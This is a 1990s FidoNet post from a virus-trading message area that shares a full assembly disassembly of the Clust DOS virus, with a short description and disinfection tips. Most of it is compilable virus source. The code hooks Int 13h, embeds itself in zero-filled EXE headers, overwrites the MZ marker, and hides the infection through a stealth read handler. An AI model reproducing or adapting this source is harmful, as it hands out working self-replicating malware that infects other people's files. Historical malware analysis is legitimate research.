;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 40 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : CLUST.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48) ;* To : Daniel Hendry ;* Subj : CLUST.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org ;Clust Virus from TridenT research group - small but fairly interesting, ;it's one of the more advanced from TridenT that I've seen with the ;possible exception of the TPE. ;This virus goes memory resident at the top of lower memory and hooks ;Int 13h. Whenever an EXE file header is written, it checks to see ;if there is a large field of 0's inside it (VERY common in EXE's) ;and, if so, will put itself inside it and change the exe marker bytes ;'MZ' to a jump to that code. In this way, it effectively converts the ;file to a COM file when it is run. After this it re-executes the EXE ;file. Because of a stealth handler on Int 13h function 2 (absolute ;disk read) the EXE file is read as it originally was (the handler ;zero's out the field in which it resides and restores the jump to ;'MZ'). Because of the way this virus works, it can only infect ;smaller EXE files. ;NOTE: ;Several commands are commented out and have the actual bytes entered ;next to them instead. This is because the compiler that Clust was ;originally compiled on used different translations than mine, and ;I wished to preserve the EXACT virus code. ;Disinfection: Because of this virus' stealth routine, disinfection should ; be possible simply by Zipping or Arjing all EXE files on an ; infected disk, then rebooting from a clean disk and unarchiving ; the files. The original archiving MUST be done while the ; virus is active in memory. Also - after rebooting - make ; sure the program you use to unarchive the files is _NOT_ ; infected. ;Disassembly by Black Wolf .model tiny .code org 100h start: jmp short EntryPoint LotsaNOPs db 122 dup (90h) ;Usually will be EXE header.... OldInt13 dd 0 EntryPoint: db 0e9h,7ch,0 ;jmp InstallVirus Int13Handler: cmp ah,3 je IsDiskWrite cmp ah,2 jne GoInt13 pushf call cs:OldInt13 ;Call Int 13h jc Exit13Handler ;Exit on error. cmp word ptr es:[bx],7EEBh ;Is sector infected? jne Exit13Handler mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ' push di cx ax ;Stealth routine..... mov cx,115h xor ax,ax db 89h,0dfh ;mov di,bx ;Zero out virus from add di,80h ;sector when it is read. rep stosb pop ax cx di Exit13Handler: iret GoInt13: jmp cs:[OldInt13] IsDiskWrite: cmp word ptr es:[bx],5A4Dh ;Is EXE file being written? jne GoInt13 cmp word ptr es:[bx+4],75h ;Is file too large? jae GoInt13 push ax cx si di ds push es pop ds db 89h,0deh ;mov si,bx add si,80h ;Look in EXE header.... mov cx,115h AllZeros: lodsb cmp al,0 loopz AllZeros cmp cx,0 ;Check to see if entire field jne ExitInfectHandler ;was zeroed - leave if not. db 89h,0dfh ;mov di,bx add di,80h mov cx,115h mov si,offset OldInt13 push cs pop ds rep movsb db 89h,0dfh ;mov di,bx ;Copy virus ;over zero area in EXE header. mov ax,7EEBh ;Stick in Jump over 'MZ' stosw ExitInfectHandler: pop ds di si cx ax ;Allow Write to process now. jmp short GoInt13 InstallVirus: mov ax,3513h int 21h ;Get Int 13 addres mov word ptr cs:[OldInt13],bx mov word ptr cs:[OldInt13+2],es mov ah,0Dh int 21h ;Flush disk buffers mov ah,36h mov dl,0 int 21h ;Get free space on default drive mov ax,cs dec ax mov ds,ax cmp byte ptr ds:0,'Z' ;Are we the last chain? jne Terminate ;If not, terminate. ;sub word ptr ds:[3],39h ;subtract from MCB size db 81h,2eh,03,0,39h,0 ;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem db 81h,2eh,12h,0,39h,0 mov si,offset OldInt13 db 89h,0f7h ;mov di,si mov es,ds:[12h] ;ES = new segment push cs pop ds mov cx,115h ;Copy virus into memory rep movsb mov ax,2513h push es pop ds mov dx,offset Int13Handler int 21h ;Set int 13 to virus handler mov ah,4Ah push cs pop es mov bx,39h int 21h ;Modify mem alloc. push cs pop ds mov bx,ds:[2ch] ;Get environment segment mov es,bx xor ax,ax mov di,1 ScanForFilename: ;Find name of file executed dec di ;in environment strings... scasw ;(located after two 0's) jnz ScanForFilename lea si,[di+2] push bx pop ds ;DS = environment segment push cs pop es ;ES = code segment mov di,offset Filename push di xor bx,bx CopyFilename: mov cx,50h inc bx lodsb cmp al,0 jne StoreFilename ;Change zero at end of mov al,0Dh ;filename to a return StoreFilename: stosb cmp al,0Dh ;If it was a return, we're loopnz CopyFilename ;done copying the filename mov byte ptr ds:[28fh],bl push cs pop ds pop si dec si int 2Eh ;Re-execute EXE file with ;Stealth handler in memory, ;so Exe is run w/o virus. Terminate: mov ah,4Ch int 21h db 0 Filename db 1 end start ;-+- Terminate 1.50/Pro ; + Origin: Fred's Place (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)